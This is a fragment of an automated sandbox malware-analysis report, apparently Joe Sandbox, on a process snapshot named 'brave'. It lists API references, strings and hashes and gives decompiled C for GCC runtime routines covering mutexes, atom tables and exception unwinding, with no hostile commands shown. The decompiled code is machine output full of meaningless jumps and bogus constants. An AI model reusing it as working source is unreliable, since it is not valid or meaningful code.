Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: fwrite$fputs$abortfreememcpy$fputcstrlen
String ID: what(): $ for for$/): $bmit ful$bmit ful$gcc.gnu.$gcc.gnu.$gh space$https://$https://$l bug re$l bug re$lease su$mat expa$not enou$nsion (P$org/bugs$org/bugs$port at $port at $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
API String ID: 1586115568-1351603976
Opcode ID: fe6879b4978ab91ad2477e5e00425517d39e91c0031cd86db954f8b7f250dbe4
Instruction ID: 50c1a8b8b9dd6488e6443c275293916cec9828e79f5b0a8e4abd23a99f2e82aa
Opcode Fuzzy Hash: fe6879b4978ab91ad2477e5e00425517d39e91c0031cd86db954f8b7f250dbe4
Instruction Fuzzy Hash: ED711721B08B4144FB34BBA2A8403AEB2A5FB44FA0F944138ED9D4B7A6DF7CD108C315

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B9F840 Relevance: 29.9, APIs: 11, Strings: 6, Instructions: 157synchronizationCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00007FF715B9F848
CreateMutexA.KERNEL32 ref: 00007FF715B9F957
WaitForSingleObject.KERNEL32 ref: 00007FF715B9F968
FindAtomA.KERNEL32 ref: 00007FF715B9F97D
AddAtomA.KERNEL32 ref: 00007FF715B9F9BD
_onexit.MSVCRT ref: 00007FF715B9F9DA
ReleaseMutex.KERNEL32 ref: 00007FF715B9F9E2
CloseHandle.KERNEL32 ref: 00007FF715B9F9EB

Strings

aaaaaaaa, xrefs: 00007FF715B9F8FE
failed to get string from atom, xrefs: 00007FF715B9FAD6
failed to add string to atom table, xrefs: 00007FF715B9FAA3
__eh_shmem3_gcc_tdm_, xrefs: 00007FF715B9F897, 00007FF715B9F8C7
aaaaaaaa, xrefs: 00007FF715B9F8F4
failed to to lock creation mutex, xrefs: 00007FF715B9FAB6

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: AtomMutex$CloseCreateCurrentFindHandleObjectProcessReleaseSingleWait_onexit
String ID: __eh_shmem3_gcc_tdm_$aaaaaaaa$aaaaaaaa$failed to add string to atom table$failed to get string from atom$failed to to lock creation mutex
API String ID: 2382646235-4003979217
Opcode ID: eeefa348b6469097a2ce0c1b6ef4fcb7977b54c7f9b7813c6b328c0e60a68bab
Instruction ID: c8a70553209b978d73d717c3d99ad9ca91dd0af3d7c4a336b3e6c82a135eaee5
Opcode Fuzzy Hash: eeefa348b6469097a2ce0c1b6ef4fcb7977b54c7f9b7813c6b328c0e60a68bab
Instruction Fuzzy Hash: 1B61A6B9E18E4381EA2DAB14E9152B6A3B0AF04FB5FC44031D55D4A670EF7CE54DC320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715B9FC40 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 129COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 00007FF715B9FD13
abort.MSVCRT(?,?,?,?,?,?,00000000,00000001,?,?,00000060,?,00007FF715BC21C5), ref: 00007FF715B9FD19
RtlUnwindEx.KERNEL32 ref: 00007FF715B9FE2C

Strings

CCG!, xrefs: 00007FF715B9FD01
CCG", xrefs: 00007FF715B9FCA1
CCG , xrefs: 00007FF715B9FCAD
CCG!, xrefs: 00007FF715B9FC69

Memory Dump Source

Source File: 0000000E.00000002.438642480.00007FF715B91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF715B90000, based on PE: true

Associated: 0000000E.00000002.438442654.00007FF715B90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440451671.00007FF715BC3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.440552961.00007FF715BC5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447646080.00007FF715E41000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447709146.00007FF715E43000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.447834685.00007FF715E49000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448061068.00007FF715E51000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448147825.00007FF715E53000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448177622.00007FF715E56000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.448236045.00007FF715E57000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff715b90000_brave.jbxd

Similarity

API ID: ExceptionRaiseUnwindabort
String ID: CCG $CCG!$CCG!$CCG"
API String ID: 4140830120-3707373406
Opcode ID: 5a5515d5399e8932a17ee12ba86523fad0d7272596fb782806b5c41e63c3ad30
Instruction ID: b7dcb426e614282caa5377ad7041dd58291f4f872c6624deecfb9b484d699743
Opcode Fuzzy Hash: 5a5515d5399e8932a17ee12ba86523fad0d7272596fb782806b5c41e63c3ad30
Instruction Fuzzy Hash: 95518C76608F8086D7749F55F8806ADB3A4F789FA8FA04126EE8D43B68CF38D595C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF715BA2220 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 51
threadCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E00007FF77FF715BA2220(void* __edi, void* __esp, void* __rbx, void* __rdi, void* __rsi, void* __rbp, void* __r12, void* __r13, void* __r14, void* __r15) {
				char _v14;
				short _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				long long _v80;
				char _v81;
				long long _v88;
				long long _v96;
				long long _v104;
				long long _v112;
				char _v120;
				void* _t206;
				signed int _t214;
				intOrPtr _t220;
				void* _t281;
				intOrPtr _t340;
				intOrPtr _t341;
				intOrPtr _t342;
				intOrPtr _t343;
				intOrPtr _t344;
				intOrPtr _t347;
				intOrPtr _t348;
				intOrPtr _t350;
				intOrPtr _t351;
				intOrPtr _t353;
				intOrPtr _t354;
				intOrPtr _t355;
				intOrPtr _t357;
				intOrPtr _t358;
				intOrPtr _t359;
				intOrPtr _t361;
				intOrPtr _t363;
				intOrPtr _t366;
				intOrPtr _t367;
				intOrPtr _t369;
				intOrPtr _t372;
				intOrPtr _t375;
				intOrPtr _t377;
				intOrPtr _t378;
				intOrPtr _t380;
				intOrPtr _t383;
				intOrPtr _t384;
				intOrPtr _t386;
				intOrPtr _t389;
				intOrPtr _t391;
				intOrPtr _t392;
				intOrPtr _t394;
				intOrPtr _t395;
				intOrPtr _t401;
				intOrPtr _t402;
				intOrPtr* _t405;
				void* _t406;
				void* _t412;
				intOrPtr* _t413;
				signed long long _t415;
				void* _t436;
				signed long long _t482;
				void* _t492;
				long long _t494;
				intOrPtr* _t496;
				intOrPtr* _t497;
				void* _t498;
				void* _t499;
				void* _t517;
				void* _t518;
				void* _t526;
				void* _t536;

				_t499 = _t498 - 0x98;
				_v120 = 0x6f727245;
				_v112 = 0x696e6165;
				_v104 = 0x70732070;
				_v96 = 0x20737965;
				_v88 = 0x65726874;
				_v80 = 0x20737965;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0;
				_v48 = 0;
				_v40 = 0;
				_v32 = 0;
				_v24 = 0;
				_v16 = 0;
				_v14 = 0;
				GetCurrentThreadId();
				r8d = 0xa;
				__imp___ultoa();
				if (_v81 == 0) goto 0x15ba2332;
				goto 0x15ba230a;
				if (0x65726874 == 0x6b) goto 0x15ba2327;
				if ( *((char*)( &_v120 + 0x65726874)) != 0) goto 0x15ba2300;
				if (0 == 0x6a) goto 0x15ba2327;
				 *((char*)(_t499 + 0x48)) = 0xa;
				 *((char*)(_t499 + 0x20646165726895)) = 0;
				OutputDebugStringA(??);
				abort();
				goto 0x15ba231b;
				asm("o16 nop [cs:eax+eax]");
				_t405 =  &_v120;
				E00007FF77FF715BA0F00( &_v120);
				E00007FF77FF715BA04E0(0x2064616572687d);
				_t220 =  *_t405;
				if (_t220 != 0) goto 0x15ba23a0;
				E00007FF77FF715BA2160();
				 *_t405 = 1;
				E00007FF77FF715BA0800(0x2064616572687d);
				_pop(_t406);
				_pop(_t492);
				_pop(_t517);
				_pop(_t526);
				goto E00007FF77FF715BA1110;
				if (_t220 == 1) goto 0x15ba2382;
				 *0x15e42c70();
				r9d = _t220;
				0x15bb16f8();
				goto 0x15ba2382;
				asm("o16 nop [eax+eax]");
				_t496 =  *0x15e46920; // 0x7ff715e51400
				_t340 =  *_t496;
				if (_t340 == 0) goto 0x15ba2518;
				if ( *((long long*)(_t340 + 0x60)) != 0) goto 0x15ba2540;
				 *((long long*)(_t340 + 0x60)) = 0x15e42bc8;
				E00007FF77FF715BA04E0(0x15e42bc8);
				if ( *((intOrPtr*)(0x20646165726a4d)) != 0) goto 0x15ba25f0;
				if ( *0x206461657268C5 == 0) goto 0x15ba2430;
				free(_t406);
				if ( *0x206461657268CD == 0) goto 0x15ba243e;
				free(_t492);
				if ( *0x206461657268D5 == 0) goto 0x15ba244c;
				free(__rdi);
				 *((long long*)(0x20646165726875)) = 0;
				 *((long long*)(0x20646165726a4d)) = 0;
				memset(__edi, 0, 2 << 0);
				_t341 =  *_t496;
				if (_t341 == 0) goto 0x15ba2758;
				if ( *((long long*)(_t341 + 0x58)) != 0) goto 0x15ba2550;
				 *((long long*)(_t341 + 0x58)) = 0x15e513b0;
				if ( *0x15e513b0 == 0) goto 0x15ba255e;
				if ( *((long long*)(_t341 + 0x58)) != 0) goto 0x15ba25c0;
				 *((long long*)(_t341 + 0x58)) = 0x15e513b0;
				 *((long long*)( *0x15e513b0 + 0x1d0)) = 0x20646165726875;
				if ( *((long long*)(_t341 + 0x58)) == 0) goto 0x15ba25e0;
				 *((long long*)( *((intOrPtr*)(_t341 + 0x58)))) = 0x20646165726875;
				if (_t341 == 0) goto 0x15ba25a3;
				_t214 = 0 |  *((long long*)(_t341 + 0x60)) != 0x00000000;
				if (_t214 == 0) goto 0x15ba25c9;
				if (_t341 == 0) goto 0x15ba2a30;
				_pop(_t494);
				_t497 = _t517;
				_t518 = _t526;
				_pop(_t536);
				goto E00007FF77FF715BA0800;
				E00007FF77FF715BA7060();
				_t342 =  *_t497;
				if ( *((long long*)(_t341 + 0x60)) == 0) goto 0x15ba2402;
				if (_t342 != 0) goto 0x15ba2540;
				E00007FF77FF715BA7060();
				asm("o16 nop [cs:eax+eax]");
				goto 0x15ba240d;
				if ( *((long long*)( *((intOrPtr*)(_t342 + 0x58)))) != 0) goto 0x15ba24a7;
				if ( *((long long*)(_t342 + 0x58)) != 0) goto 0x15ba26d8;
				 *((long long*)(_t342 + 0x58)) = 0x15e513b0;
				 *0x15e513b0 = _t494;
				if ((_t214 & 0xffffff00 |  *((long long*)(_t342 + 0x50)) != 0x00000000) == 0) goto 0x15ba280d;
				if (_t342 == 0) goto 0x15ba2c8c;
				 *((long long*)( *((intOrPtr*)(_t342 + 0x50)))) =  *0x15e513b0;
				if (_t342 != 0) goto 0x15ba24e2;
				E00007FF77FF715BA7060();
				_t343 =  *_t497;
				goto 0x15ba24ea;
				goto 0x15ba24bd;
				 *((long long*)(_t343 + 0x60)) = 0x15e42bc8;
				goto 0x15ba24ff;
				 *((long long*)(_t343 + 0x58)) = 0x15e513b0;
				goto 0x15ba24d6;
				_t344 =  *_t497;
				if (_t344 == 0) goto 0x15ba2a40;
				if ( *((long long*)(_t344 + 0x70)) != 0) goto 0x15ba26c8;
				 *((long long*)(_t344 + 0x70)) = 0x15e513a0;
				if ( *0x15e513a0 == 0) goto 0x15ba2422;
				if ( *((long long*)( *_t497 + 0x70)) == 0) goto 0x15ba2820;
				r12d = 0;
				goto 0x15ba266a;
				asm("o16 nop [cs:eax+eax]");
				if (0x15e513b0 == _t518) goto 0x15ba2422;
				if (0x7ff715e513af - _t518 < 0) goto 0x15ba2422;
				_t347 =  *_t497;
				if (_t347 == 0) goto 0x15ba2708;
				if ( *((long long*)(_t347 + 0x68)) == 0) goto 0x15ba26e8;
				_t348 =  *_t497;
				_t482 = _t518 + 0x7ff715e513af >> 1 << 4;
				if (_t536 ==  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t347 + 0x68)))) + _t482 + 8))) goto 0x15ba2830;
				if (_t348 == 0) goto 0x15ba2730;
				if ( *((long long*)(_t348 + 0x68)) == 0) goto 0x15ba26f8;
				_t350 =  *((intOrPtr*)( *((intOrPtr*)(_t348 + 0x68))));
				if (_t536 -  *((intOrPtr*)(_t350 + _t482 + 8)) < 0) goto 0x15ba2650;
				goto 0x15ba265d;
				asm("o16 nop [eax+eax]");
				_t351 =  *((intOrPtr*)(_t350 + 0x70));
				goto 0x15ba2616;
				goto 0x15ba2574;
				 *((long long*)(_t351 + 0x68)) = 0x15e513a8;
				goto 0x15ba2689;
				 *((long long*)(_t351 + 0x68)) = 0x15e513a8;
				goto 0x15ba26b2;
				E00007FF77FF715BA7060();
				_t353 =  *_t497;
				if ( *0x7FF715E51410 == 0) goto 0x15ba26e8;
				if (_t353 != 0) goto 0x15ba2681;
				E00007FF77FF715BA7060();
				goto 0x15ba2681;
				E00007FF77FF715BA7060();
				_t354 =  *_t497;
				if ( *((long long*)(_t353 + 0x68)) == 0) goto 0x15ba26f8;
				if (_t354 != 0) goto 0x15ba26ae;
				E00007FF77FF715BA7060();
				goto 0x15ba26ae;
				E00007FF77FF715BA7060();
				_t355 =  *_t497;
				if ( *((long long*)(_t354 + 0x58)) == 0) goto 0x15ba2492;
				if (_t355 != 0) goto 0x15ba2550;
				E00007FF77FF715BA7060();
				if ( *((long long*)( *((intOrPtr*)(_t355 + 0x58)))) == 0) goto 0x15ba2aac;
				_t357 =  *_t497;
				if (_t357 != 0) goto 0x15ba24a7;
				E00007FF77FF715BA7060();
				_t358 =  *_t497;
				if ( *((long long*)(_t357 + 0x58)) == 0) goto 0x15ba24b2;
				if (_t358 != 0) goto 0x15ba25c0;
				E00007FF77FF715BA7060();
				_t359 =  *_t497;
				 *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t358 + 0x58)))) + 0x1d0)) = _t494;
				if (_t359 != 0) goto 0x15ba24c7;
				E00007FF77FF715BA7060();
				if ( *((long long*)(_t359 + 0x58)) == 0) goto 0x15ba25e0;
				if ( *_t497 != 0) goto 0x15ba24d2;
				E00007FF77FF715BA7060();
				_t361 =  *_t497;
				goto 0x15ba24d6;
				 *((long long*)(_t361 + 0x50)) = 0x15e513b8;
				goto 0x15ba2594;
				 *((long long*)(_t361 + 0x70)) = 0x15e513a0;
				goto 0x15ba2633;
				if (_t361 == 0) goto 0x15ba2c9e;
				if ( *((long long*)(_t361 + 0x68)) != 0) goto 0x15ba2908;
				 *((long long*)(_t361 + 0x68)) = 0x15e513a8;
				_t412 =  *((intOrPtr*)(_t351 + 0x58)) + 1;
				if ( *((long long*)(_t361 + 0x70)) != 0) goto 0x15ba2b20;
				_t281 =  *0x15e513a0 - _t412; // 0x1
				 *((long long*)(_t361 + 0x70)) = 0x15e513a0;
				if (_t281 > 0) goto 0x15ba2ba2;
				if ( *((long long*)(_t361 + 0x70)) != 0) goto 0x15ba2a10;
				 *((long long*)(_t361 + 0x70)) = 0x15e513a0;
				 *0x15e513a0 =  *0x15e513a0 - 1;
				if ( *((long long*)(_t361 + 0x70)) != 0) goto 0x15ba2b10;
				 *((long long*)(_t361 + 0x70)) = 0x15e513a0;
				if ( *0x15e513a0 != 0) goto 0x15ba2422;
				if ( *((long long*)(_t361 + 0x68)) == 0) goto 0x15ba2c5b;
				free(??);
				_t363 =  *_t497;
				if (_t363 == 0) goto 0x15ba2cb7;
				if ( *((long long*)(_t363 + 0x78)) == 0) goto 0x15ba2c4b;
				_t413 =  *((intOrPtr*)(_t363 + 0x78));
				 *_t413 = 0;
				if ( *((long long*)(_t363 + 0x70)) == 0) goto 0x15ba2c38;
				 *((long long*)( *((intOrPtr*)(_t363 + 0x70)))) =  *_t413;
				goto 0x15ba2422;
				if ( *_t497 != 0) goto 0x15ba284f;
				E00007FF77FF715BA7060();
				_t366 =  *_t497;
				if (_t366 != 0) goto 0x15ba2853;
				E00007FF77FF715BA7060();
				_t367 =  *_t497;
				if ( *((long long*)(_t366 + 0x70)) == 0) goto 0x15ba285e;
				if (_t367 != 0) goto 0x15ba2b20;
				E00007FF77FF715BA7060();
				_t369 =  *_t497;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t367 + 0x70)))) - _t413 + 1 <= 0) goto 0x15ba2b80;
				if (_t369 != 0) goto 0x15ba2b2d;
				E00007FF77FF715BA7060();
				if ( *((long long*)(_t369 + 0x70)) == 0) goto 0x15ba2b34;
				if ( *_t497 != 0) goto 0x15ba2ba2;
				E00007FF77FF715BA7060();
				_t372 =  *_t497;
				if (_t372 != 0) goto 0x15ba2b49;
				E00007FF77FF715BA7060();
				if ( *((long long*)(_t372 + 0x68)) == 0) goto 0x15ba2c28;
				if ( *_t497 != 0) goto 0x15ba2b54;
				E00007FF77FF715BA7060();
				_t375 =  *_t497;
				if (_t375 != 0) goto 0x15ba2c6e;
				E00007FF77FF715BA7060();
				if ( *((long long*)(_t375 + 0x68)) == 0) goto 0x15ba2c79;
				if ( *_t497 != 0) goto 0x15ba2b65;
				E00007FF77FF715BA7060();
				goto 0x15ba2b65;
				_t377 =  *_t497;
				if (_t377 == 0) goto 0x15ba2ba8;
				goto 0x15ba288c;
				asm("o16 nop [cs:eax+eax]");
				E00007FF77FF715BA7060();
				goto 0x15ba24fb;
				asm("o16 nop [eax+eax]");
				E00007FF77FF715BA7060();
				_t378 =  *_t497;
				if ( *((long long*)(_t377 + 0x70)) == 0) goto 0x15ba2608;
				if (_t378 != 0) goto 0x15ba26c8;
				E00007FF77FF715BA7060();
				if ( *((long long*)( *((intOrPtr*)(_t378 + 0x70)))) == 0) goto 0x15ba2422;
				_t380 =  *_t497;
				if (_t380 != 0) goto 0x15ba2624;
				E00007FF77FF715BA7060();
				if ( *((long long*)(_t380 + 0x70)) == 0) goto 0x15ba2820;
				if ( *_t497 != 0) goto 0x15ba262f;
				E00007FF77FF715BA7060();
				goto 0x15ba2633;
				_t383 =  *_t497;
				if (_t383 != 0) goto 0x15ba255e;
				E00007FF77FF715BA7060();
				_t384 =  *_t497;
				if ( *((long long*)(_t383 + 0x58)) == 0) goto 0x15ba2569;
				if (_t384 != 0) goto 0x15ba26d8;
				E00007FF77FF715BA7060();
				_t415 =  *((intOrPtr*)(_t384 + 0x58));
				 *_t415 = _t494;
				if ( *_t497 != 0) goto 0x15ba2577;
				E00007FF77FF715BA7060();
				_t386 =  *_t497;
				goto 0x15ba257f;
				goto 0x15ba28a6;
				if (_t415 -  *((intOrPtr*)( *((intOrPtr*)(_t386 + 0x70)))) >= 0) goto 0x15ba2876;
				if ( *((long long*)(_t386 + 0x70)) != 0) goto 0x15ba2ba2;
				 *((long long*)(_t386 + 0x70)) = 0x15e513a0;
				if ( *((long long*)(_t386 + 0x68)) == 0) goto 0x15ba2c28;
				_t436 =  *((intOrPtr*)( *((intOrPtr*)(_t386 + 0x68)))) + (_t415 << 4) - 0x10;
				memcpy(??, ??, ??);
				_t389 =  *_t497;
				if (_t389 != 0) goto 0x15ba2876;
				E00007FF77FF715BA7060();
				if ( *((long long*)(_t389 + 0x70)) != 0) goto 0x15ba2a10;
				goto 0x15ba2881;
				goto 0x15ba2b3f;
				E00007FF77FF715BA7060();
				_t391 =  *_t497;
				 *((long long*)( *((intOrPtr*)( *_t497 + 0x70)))) =  *((long long*)( *((intOrPtr*)( *_t497 + 0x70)))) - 1;
				if (_t391 != 0) goto 0x15ba2890;
				E00007FF77FF715BA7060();
				_t392 =  *_t497;
				if ( *((long long*)(_t391 + 0x70)) == 0) goto 0x15ba289b;
				if (_t392 != 0) goto 0x15ba2b10;
				E00007FF77FF715BA7060();
				if ( *((long long*)( *((intOrPtr*)(_t392 + 0x70)))) != 0) goto 0x15ba2422;
				_t394 =  *_t497;
				if (_t394 != 0) goto 0x15ba28b0;
				E00007FF77FF715BA7060();
				_t395 =  *_t497;
				if ( *((long long*)(_t394 + 0x68)) == 0) goto 0x15ba2c5b;
				if (_t395 != 0) goto 0x15ba28bb;
				E00007FF77FF715BA7060();
				goto 0x15ba28bb;
				 *((long long*)(_t395 + 0x68)) = 0x15e513a8;
				goto 0x15ba2b58;
				 *((long long*)(_t395 + 0x70)) = 0x15e513a0;
				goto 0x15ba28f9;
				 *0x7FF715E51418 = 0x15e51398;
				goto 0x15ba28e3;
				 *0x7FF715E51408 = 0x15e513a8;
				goto 0x15ba28bf;
				if ( *((long long*)(0x7ff715e51410)) != 0) goto 0x15ba2b65;
				 *((long long*)(0x7ff715e51410)) = 0x15e513a8;
				goto 0x15ba2b69;
				E00007FF77FF715BA7060();
				goto 0x15ba2594;
				E00007FF77FF715BA7060();
				if ( *((long long*)( *_t497 + 0x68)) != 0) goto 0x15ba2908;
				goto 0x15ba2844;
				E00007FF77FF715BA7060();
				_t401 =  *_t497;
				if ( *((long long*)( *_t497 + 0x78)) == 0) goto 0x15ba2c4b;
				if (_t401 != 0) goto 0x15ba28df;
				E00007FF77FF715BA7060();
				_t402 =  *_t497;
				 *((long long*)( *((intOrPtr*)(_t401 + 0x78)))) = 0;
				if (_t402 != 0) goto 0x15ba28ea;
				E00007FF77FF715BA7060();
				if ( *((long long*)(_t402 + 0x70)) == 0) goto 0x15ba2c38;
				if ( *_t497 != 0) goto 0x15ba28f5;
				_t206 = E00007FF77FF715BA7060();
				goto 0x15ba28f5;
				asm("o16 nop [eax+eax]");
				if (_t436 == 0) goto 0x15ba2d2f;
				if ( *((long long*)(_t436 + 0x1d0)) == 0) goto 0x15ba2d30;
				return _t206;
			}

0x7ff715ba2220
0x7ff715ba223b
0x7ff715ba224a
0x7ff715ba2259
0x7ff715ba2268
0x7ff715ba226f
0x7ff715ba2276
0x7ff715ba227b
0x7ff715ba2284
0x7ff715ba228d
0x7ff715ba2296
0x7ff715ba229f
0x7ff715ba22a8
0x7ff715ba22b1
0x7ff715ba22bd
0x7ff715ba22c5
0x7ff715ba22cd
0x7ff715ba22d8
0x7ff715ba22e0
0x7ff715ba22eb
0x7ff715ba22f7
0x7ff715ba2308
0x7ff715ba2311
0x7ff715ba2316
0x7ff715ba231d
0x7ff715ba2322
0x7ff715ba2327
0x7ff715ba232d
0x7ff715ba2341
0x7ff715ba2343
0x7ff715ba235a
0x7ff715ba235d
0x7ff715ba236c
0x7ff715ba2371
0x7ff715ba2375
0x7ff715ba2377
0x7ff715ba237c
0x7ff715ba2385
0x7ff715ba2391
0x7ff715ba2392
0x7ff715ba2393
0x7ff715ba2395
0x7ff715ba2397
0x7ff715ba23a3
0x7ff715ba23aa
0x7ff715ba23b0
0x7ff715ba23c0
0x7ff715ba23c5
0x7ff715ba23c7
0x7ff715ba23e0
0x7ff715ba23e7
0x7ff715ba23f1
0x7ff715ba23fc
0x7ff715ba2409
0x7ff715ba240d
0x7ff715ba241c
0x7ff715ba2429
0x7ff715ba242b
0x7ff715ba2437
0x7ff715ba2439
0x7ff715ba2445
0x7ff715ba2447
0x7ff715ba2455
0x7ff715ba245c
0x7ff715ba2477
0x7ff715ba247a
0x7ff715ba2481
0x7ff715ba248c
0x7ff715ba2499
0x7ff715ba24a1
0x7ff715ba24ac
0x7ff715ba24b9
0x7ff715ba24c0
0x7ff715ba24cc
0x7ff715ba24d6
0x7ff715ba24dc
0x7ff715ba24e7
0x7ff715ba24ec
0x7ff715ba24f5
0x7ff715ba2504
0x7ff715ba2506
0x7ff715ba2507
0x7ff715ba250b
0x7ff715ba250f
0x7ff715ba2518
0x7ff715ba2522
0x7ff715ba2526
0x7ff715ba252f
0x7ff715ba2531
0x7ff715ba2536
0x7ff715ba2544
0x7ff715ba2558
0x7ff715ba2563
0x7ff715ba2570
0x7ff715ba2574
0x7ff715ba2581
0x7ff715ba258a
0x7ff715ba2597
0x7ff715ba259d
0x7ff715ba25a3
0x7ff715ba25ad
0x7ff715ba25b4
0x7ff715ba25c4
0x7ff715ba25d0
0x7ff715ba25d4
0x7ff715ba25e7
0x7ff715ba25eb
0x7ff715ba25f0
0x7ff715ba25f7
0x7ff715ba2602
0x7ff715ba260f
0x7ff715ba261a
0x7ff715ba2629
0x7ff715ba2636
0x7ff715ba2644
0x7ff715ba2646
0x7ff715ba2653
0x7ff715ba2660
0x7ff715ba2666
0x7ff715ba2674
0x7ff715ba267f
0x7ff715ba2685
0x7ff715ba268f
0x7ff715ba2698
0x7ff715ba26a1
0x7ff715ba26ac
0x7ff715ba26b2
0x7ff715ba26ba
0x7ff715ba26c0
0x7ff715ba26c2
0x7ff715ba26c8
0x7ff715ba26cc
0x7ff715ba26dc
0x7ff715ba26e8
0x7ff715ba26ef
0x7ff715ba26f8
0x7ff715ba26ff
0x7ff715ba2708
0x7ff715ba2712
0x7ff715ba2716
0x7ff715ba271b
0x7ff715ba2721
0x7ff715ba2726
0x7ff715ba2730
0x7ff715ba273a
0x7ff715ba273e
0x7ff715ba2743
0x7ff715ba2749
0x7ff715ba274e
0x7ff715ba2758
0x7ff715ba2760
0x7ff715ba2769
0x7ff715ba2772
0x7ff715ba2778
0x7ff715ba2785
0x7ff715ba278b
0x7ff715ba2792
0x7ff715ba2798
0x7ff715ba27a0
0x7ff715ba27a9
0x7ff715ba27b2
0x7ff715ba27b8
0x7ff715ba27c0
0x7ff715ba27cb
0x7ff715ba27d5
0x7ff715ba27db
0x7ff715ba27ec
0x7ff715ba27f5
0x7ff715ba27fb
0x7ff715ba2804
0x7ff715ba2808
0x7ff715ba2814
0x7ff715ba2818
0x7ff715ba2827
0x7ff715ba282b
0x7ff715ba2833
0x7ff715ba283e
0x7ff715ba284b
0x7ff715ba284f
0x7ff715ba2858
0x7ff715ba2865
0x7ff715ba286c
0x7ff715ba2870
0x7ff715ba287b
0x7ff715ba2888
0x7ff715ba288c
0x7ff715ba2895
0x7ff715ba28a2
0x7ff715ba28aa
0x7ff715ba28b5
0x7ff715ba28c2
0x7ff715ba28c7
0x7ff715ba28ce
0x7ff715ba28d9
0x7ff715ba28df
0x7ff715ba28e3
0x7ff715ba28ef
0x7ff715ba28fc
0x7ff715ba28ff
0x7ff715ba290f
0x7ff715ba2915
0x7ff715ba291a
0x7ff715ba2925
0x7ff715ba292b
0x7ff715ba2935
0x7ff715ba2939
0x7ff715ba2942
0x7ff715ba2948
0x7ff715ba2954
0x7ff715ba2958
0x7ff715ba2968
0x7ff715ba296e
0x7ff715ba297c
0x7ff715ba2985
0x7ff715ba298b
0x7ff715ba2997
0x7ff715ba29a5
0x7ff715ba29ab
0x7ff715ba29b9
0x7ff715ba29c2
0x7ff715ba29c8
0x7ff715ba29d4
0x7ff715ba29de
0x7ff715ba29e4
0x7ff715ba29f2
0x7ff715ba29fb
0x7ff715ba2a01
0x7ff715ba2a06
0x7ff715ba2a10
0x7ff715ba2a17
0x7ff715ba2a21
0x7ff715ba2a26
0x7ff715ba2a30
0x7ff715ba2a35
0x7ff715ba2a3a
0x7ff715ba2a40
0x7ff715ba2a4a
0x7ff715ba2a4e
0x7ff715ba2a57
0x7ff715ba2a5d
0x7ff715ba2a6a
0x7ff715ba2a70
0x7ff715ba2a77
0x7ff715ba2a7d
0x7ff715ba2a8b
0x7ff715ba2a94
0x7ff715ba2a9a
0x7ff715ba2aa7
0x7ff715ba2aac
0x7ff715ba2ab3
0x7ff715ba2ab9
0x7ff715ba2ac1
0x7ff715ba2aca
0x7ff715ba2ad3
0x7ff715ba2ad9
0x7ff715ba2ade
0x7ff715ba2ae6
0x7ff715ba2aec
0x7ff715ba2af2
0x7ff715ba2afc
0x7ff715ba2b03
0x7ff715ba2b14
0x7ff715ba2b27
0x7ff715ba2b32
0x7ff715ba2b3b
0x7ff715ba2b4e
0x7ff715ba2b72
0x7ff715ba2b77
0x7ff715ba2b7c
0x7ff715ba2b83
0x7ff715ba2b89
0x7ff715ba2b93
0x7ff715ba2b9d
0x7ff715ba2ba6
0x7ff715ba2ba8
0x7ff715ba2bb1
